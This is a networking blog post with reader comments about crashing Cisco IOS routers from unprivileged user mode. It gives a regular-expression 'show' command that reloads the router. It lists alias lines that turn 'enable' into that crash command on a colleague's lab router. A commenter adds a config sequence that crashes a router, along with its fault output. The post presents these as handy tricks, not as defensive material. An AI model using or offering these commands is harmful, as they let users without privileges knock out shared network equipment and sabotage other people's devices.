I’m over in London this week for a CCIE Voice Bootcamp and a support engineer IMs me asking a question. He needed to remotely reload a backbone router for a new rack but for some reason the standard enable password we use for the backbone routers wasn’t working. I asked him if he could just VPN in and reload it using the power controller. He told me he was telneted into the rack using his iPhone and wanted to just do it via telnet as opposed to opening a VPN connection. For a moment I thought to myself he was just out of luck but I then remembered the old regular expression bug that would reload the router (i.e. “show ip bgp regexp ([0-9]*)(_\1)+”, “show version | include ([0-9]*)(_\1)+”, etc). He types it in, the router crashes and all is good. This also reminded me that I need to update the initial configurations on Brian McGahan’s development rack (see below) 
alias exec en show version | include ([0-9]*)(_\1)+
alias exec ena show version | include ([0-9]*)(_\1)+
alias exec enab show version | include ([0-9]*)(_\1)+
alias exec enabl show version | include ([0-9]*)(_\1)+
alias exec enable show version | include ([0-9]*)(_\1)+
About Brian Dennis, CCIE #2210:
Brian Dennis has been in the networking industry for more than 22 years, with a focus on Cisco networking for the past 16 years. Brian achieved his first CCIE in Routing & Switching in 1996, and is currently the only ten year CCIE that holds five CCIE certifications. Prior to working with INE, Brian taught and developed CCIE preparation courses for various well known training organizations. Brian not only brings his years of teaching experience to the classroom, but also years of real world enterprise and service provider experience.
You can leave a response, or trackback from your own site.
9 Responses to “Rebooting a Router from User Mode”
Leave a Reply
Loading ...
it seems to be a well known, old “great feature”, because it’s working perfect on my 3550, 3560, 2811, 2610….
Thank you for sharing it!
…and let me share another bug:
Rack1R4(config)#ipv pre CRASH per ::/0
Rack1R4(config)#ipv router rip RIPng
% IPv6 routing not enabled
Rack1R4(config)#ipv uni
Rack1R4(config)#ipv router rip RIPng
Rack1R4(config-rtr)#distribute-list prefix-list CRASH out f0/0
Rack1R4(config-rtr)#ex
Rack1R4(config)#no ipv pref CRASH
%ALIGN-1-FATAL: Corrupted program counter 03:36:17 UTC Mon Oct 13 2008
pc=0×0 , ra=0×42001634 , sp=0×4774FFC8
%ALIGN-1-FATAL: Corrupted program counter 03:36:17 UTC Mon Oct 13 2008
pc=0×0 , ra=0×42001634 , sp=0×4774FFC8
03:36:17 UTC Mon Oct 13 2008: TLB (load or instruction fetch) exception, CPU signal 10, PC = 0×0
——————————————————————–
Possible software fault. Upon reccurence, please collect
crashinfo, “show tech” and contact Cisco Technical Support.
Tested it on a 3560 with 12.2.44 and a 3640 with 12.4.19 and both didn’t crash with these bugs
Worked for me in the voice lab.
I’ve just crash reloaded each router in turn!
[...] Dennis shares a method of crashing a router along with some “improvements” that he has made to Brian McGahan’s [...]
I have also tested this with Dynamips emulation of 3640 and the virtual router did crash !
This will be an interesting tip to keep in mind while I’m out of the office.
[...] Rebooting a Router from User Mode Bug oder Feature? Jedoch schon lange bekannt, das man die RegEx Engine im User Mode dazu verwenden kann den Router zu rebooten auch ohne die nötigen Rechte. [...]
I am amazed with it. It is a good thing for my research. Thanks. ^_^